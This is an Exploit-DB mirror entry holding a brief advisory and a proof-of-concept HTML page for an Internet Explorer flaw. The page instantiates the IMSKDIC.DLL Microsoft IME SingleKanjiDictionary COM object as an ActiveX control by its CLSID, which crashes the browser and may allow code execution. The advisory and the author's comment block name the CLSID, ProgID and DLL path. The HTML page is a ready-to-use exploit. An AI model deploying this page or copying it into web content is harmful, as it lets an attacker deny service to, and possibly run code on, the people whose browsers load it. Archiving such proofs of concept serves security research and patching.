exploit-db-mirror/exploits/windows/dos/28387.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

24 lines
No EOL
903 B
HTML

source: https://www.securityfocus.com/bid/19521/info
Microsoft Internet Explorer is prone to a denial-of-service vulnerability.
This issue occurs because the application fails to load a DLL library when instantiated as an ActiveX control.
An attacker may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users and may cause arbitrary code to run within the context of the application.
<-- /Internet Explorer (IMSKDIC.DLL) COM Object Instantiation Vulnerability
//tested XP SP2 CN
// nop (nop#xsec.org)
// http://www.xsec.org
// CLSID: {6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}
// Info: Microsoft IME SingleKanjiDictionary interface
// ProgID: IMESingleKanjiDict.8.1
// InprocServer32: C:\WINDOWS\IME\imjp8_1\Applets\IMSKDIC.DLL
--!>
<html> <body>
<object classid="CLSID:{6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}" /object>
</body> </html>